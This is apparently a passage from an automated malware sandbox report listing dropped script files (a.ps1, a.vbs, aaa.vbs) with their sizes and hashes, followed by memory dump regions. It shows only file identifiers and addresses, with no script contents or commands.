                                                                                    d029cd66ff74a8a6fa55d6b4addab696f6c8e97c

                                                                                    SHA256

                                                                                    bd4fd9e687b305ca5db9f8359a300a7fe2eb6236a09c0360c44043097d7d860a

                                                                                    SHA512

                                                                                    7fd21af965e6dd98025567cb07397c30c0efedd2d0fc453d0943274a12227350baf58c6825db85c739a797bf1dbf7357111eebc1a5f924aac4617c85b5a97d95

                                                                                  • C:\Users\Admin\Desktop\a.ps1

                                                                                    Filesize

                                                                                    729B

                                                                                    MD5

                                                                                    7b064a6209f893bdd49ee27ab509e271

                                                                                    SHA1

                                                                                    d4cc84e215cd2b35a2241298d1782d7873399f72

                                                                                    SHA256

                                                                                    9c3f6def8ce4f73c49f861a191e7e3e36f0e9759de9bda8b0f79ca895decb8c7

                                                                                    SHA512

                                                                                    5f347947dbb13a5fc96c581308e0da8d9a217f4cc413a0c5fd0a216e1c6c96e789e7abd2ec1128a0b01ac6edf78b60097bca60b3ccff22aa89df23b168f875e2

                                                                                  • C:\Users\Admin\Desktop\a.vbs

                                                                                    Filesize

                                                                                    735B

                                                                                    MD5

                                                                                    3c15cc7a6587bd5a38b2f3695f5fdd70

                                                                                    SHA1

                                                                                    5eb07663b508cc6288514b9d55c0bff2db78f679

                                                                                    SHA256

                                                                                    6227ddc0d33925e3981078595fa50d52819b3cab35f2800bc81eb0860ad726a3

                                                                                    SHA512

                                                                                    15bd0a4fb9c76121441b648a9256a16c5c7bcd3e7d84f36a3107934256f0b27da59c14738fd8becabee531ed0efee58feb0322ec36f277a4b3c11350f8bc3168

                                                                                  • C:\Users\Admin\Desktop\aaa.vbs

                                                                                    Filesize

                                                                                    545B

                                                                                    MD5

                                                                                    94d9f0f40db24e05f57932150c193171

                                                                                    SHA1

                                                                                    cc52620223564a1a5a8855edc9b86ef196b57be2

                                                                                    SHA256

                                                                                    95eda985122dc3d7bc221b0fcef20eeb77503bb0bfa7fd5896fd511c4ddbb888

                                                                                    SHA512

                                                                                    edd628f6276656d0769f6b1c54e8c26efaa8b0fab334fe64df66c65cc86bb2c71b15b137c2373ac00a027841961c77f75ee712f3cd142e5fea3c6a211c6afcd0


                                                                                    Filesize

                                                                                    512KB

                                                                                  • memory/2636-260-0x000007FEF2520000-0x000007FEF2EBD000-memory.dmp

                                                                                    Filesize

                                                                                    9.6MB

                                                                                  • memory/2636-262-0x0000000002DF0000-0x0000000002E70000-memory.dmp

                                                                                    Filesize

                                                                                    512KB

                                                                                  • memory/2636-261-0x0000000002DF0000-0x0000000002E70000-memory.dmp

                                                                                    Filesize

                                                                                    512KB

                                                                                  • memory/2852-301-0x0000000000230000-0x0000000000231000-memory.dmp

                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/2920-10-0x0000000002870000-0x00000000028F0000-memory.dmp

                                                                                    Filesize

                                                                                    512KB

                                                                                  • memory/2920-4-0x000000001B720000-0x000000001BA02000-memory.dmp

                                                                                    Filesize

                                                                                    2.9MB

                                                                                  • memory/2920-7-0x0000000002870000-0x00000000028F0000-memory.dmp

                                                                                    Filesize

                                                                                    512KB

                                                                                  • memory/2920-8-0x000007FEF5A30000-0x000007FEF63CD000-memory.dmp

                                                                                    Filesize

                                                                                    9.6MB

                                                                                  • memory/2920-6-0x000007FEF5A30000-0x000007FEF63CD000-memory.dmp

                                                                                    Filesize

                                                                                    9.6MB

                                                                                  • memory/2920-9-0x0000000002870000-0x00000000028F0000-memory.dmp

                                                                                    Filesize

                                                                                    512KB

                                                                                  • memory/2920-11-0x000007FEF5A30000-0x000007FEF63CD000-memory.dmp

                                                                                    Filesize

                                                                                    9.6MB

                                                                                  • memory/2920-5-0x00000000026F0000-0x00000000026F8000-memory.dmp

                                                                                    Filesize

                                                                                    32KB